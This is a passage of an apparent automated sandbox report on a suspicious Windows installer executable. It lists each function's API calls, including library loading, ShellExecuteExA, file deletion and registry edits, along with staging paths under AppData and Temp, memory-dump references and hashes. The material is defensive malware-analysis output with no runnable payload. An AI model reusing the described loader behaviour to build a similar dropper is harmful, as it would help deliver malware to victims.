                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                        • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                        • Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                        • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                        Function 004015E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405CC6
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                                          • Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate,00000000,00000000,000000F0), ref: 00401661
                                        Strings
                                        • C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate, xrefs: 00401656
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate
                                        • API String ID: 1892508949-1124611765
                                        • Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                        • Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
                                        • Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                        • Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E
                                        Function 00401F1E Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405969: ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978
                                          • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                                          • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?), ref: 00401FE5
                                        Strings
                                        • C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate, xrefs: 00401F6C
                                        • @, xrefs: 00401F89
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                        • String ID: @$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate
                                        • API String ID: 165873841-3200100611
                                        • Opcode ID: 4045d026b52495829b245bff0c8a860c6011144a5f3f89b1fb6398ee91597c2b
                                        • Instruction ID: 5ba2b647f7f38adafa31df8ed61492a5ad7c71a48fde22f3d1fa4ecdb07d8f9a
                                        • Opcode Fuzzy Hash: 4045d026b52495829b245bff0c8a860c6011144a5f3f89b1fb6398ee91597c2b
                                        • Instruction Fuzzy Hash: 63113A71E042099EDF51EFF9CA49A8DBBF4AF04318F14403AE115FB2D2D6B98946DB18
                                        Function 00405A07 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405DFB: GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                                          • Part of subcall function 00405DFB: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                                        • RemoveDirectoryA.KERNEL32(?,?,?,00000000,00405BF6), ref: 00405A22
                                        • DeleteFileA.KERNELBASE(?,?,?,00000000,00405BF6), ref: 00405A2A
                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405A42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$Attributes$DeleteDirectoryRemove
                                        • String ID:
                                        • API String ID: 1655745494-0
                                        • Opcode ID: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                                        • Instruction ID: 6cbbeebccd270b92d1032a3138f2130d4a861fe222b861409a1048e863718438
                                        • Opcode Fuzzy Hash: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                                        • Instruction Fuzzy Hash: 7FE0E531314A915BC3105774AA8CA5B2A98DFC2315F050A3AF4A2B10C0CB78444A8F6D
                                        Function 00402543 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv507D.tmp,00000000,00000011,00000002), ref: 00402612
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID:
                                        • API String ID: 3356406503-0
                                        • Opcode ID: 2b7bc4f9418c8989dcd2ffdae205d0de7b18417eb2397653a7bee02426985274
                                        • Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
                                        • Opcode Fuzzy Hash: 2b7bc4f9418c8989dcd2ffdae205d0de7b18417eb2397653a7bee02426985274
                                        • Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A
                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                        • Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
                                        • Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                        • Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C
                                        Function 0040244E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402478
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CloseDeleteValue
                                        • String ID:
                                        • API String ID: 2831762973-0
                                        • Opcode ID: e954de63805926efc489198397230352766dfc3c3be1974fd50265881effd18f
                                        • Instruction ID: 01f6084b7650a9b213f52d22935e9030d34abb49b24569214b94c05b06999087
                                        • Opcode Fuzzy Hash: e954de63805926efc489198397230352766dfc3c3be1974fd50265881effd18f
                                        • Instruction Fuzzy Hash: D3F0B132604121AFDB60EBA49F4DA7F72A99B40314F15003FF101B71C1D9F84D42466E
                                        Function 00402653 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 00402674
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll, xrefs: 00402665, 0040268A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll
                                        • API String ID: 1659193697-1987037384
                                        • Opcode ID: 366b14a8103b65e729c936a7bf154db847742850a32fdf27df13daa7337a2ab1
                                        • Instruction ID: 61272aa0762119994c047e7fd20119112025cf8b6efb119306360bab3c915050
                                        • Opcode Fuzzy Hash: 366b14a8103b65e729c936a7bf154db847742850a32fdf27df13daa7337a2ab1
                                        • Instruction Fuzzy Hash: CCF08972908244AADB20F7B65A49E5F66B49B81314B20443FE141B71C2C5FD45539A5E
                                        Function 00405897 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                                        • GetLastError.KERNEL32 ref: 004058E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                        • Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
                                        • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                        • Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99
                                        Function 00401EEA Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$EnableShow
                                        • String ID:
                                        • API String ID: 1136574915-0
                                        • Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                        • Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
                                        • Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                        • Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D
                                        Function 00401594 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                                        • Instruction ID: 6682d38faa1af99df36a0191d691bb63ef923b98cac77dddb2e5d8f8093f9b88
                                        • Opcode Fuzzy Hash: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                                        • Instruction Fuzzy Hash: 5AE04F727001109FCF64DB94EEA086E73E6E794310360043FD102B3290C6749C068A68
                                        Function 004066B5 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                          • Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                          • Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
                                          • Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                        • Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
                                        • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                        • Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E
                                        Function 00405E20 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                        • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                                        • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                        • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                                        Function 00405DFB Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                                        • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
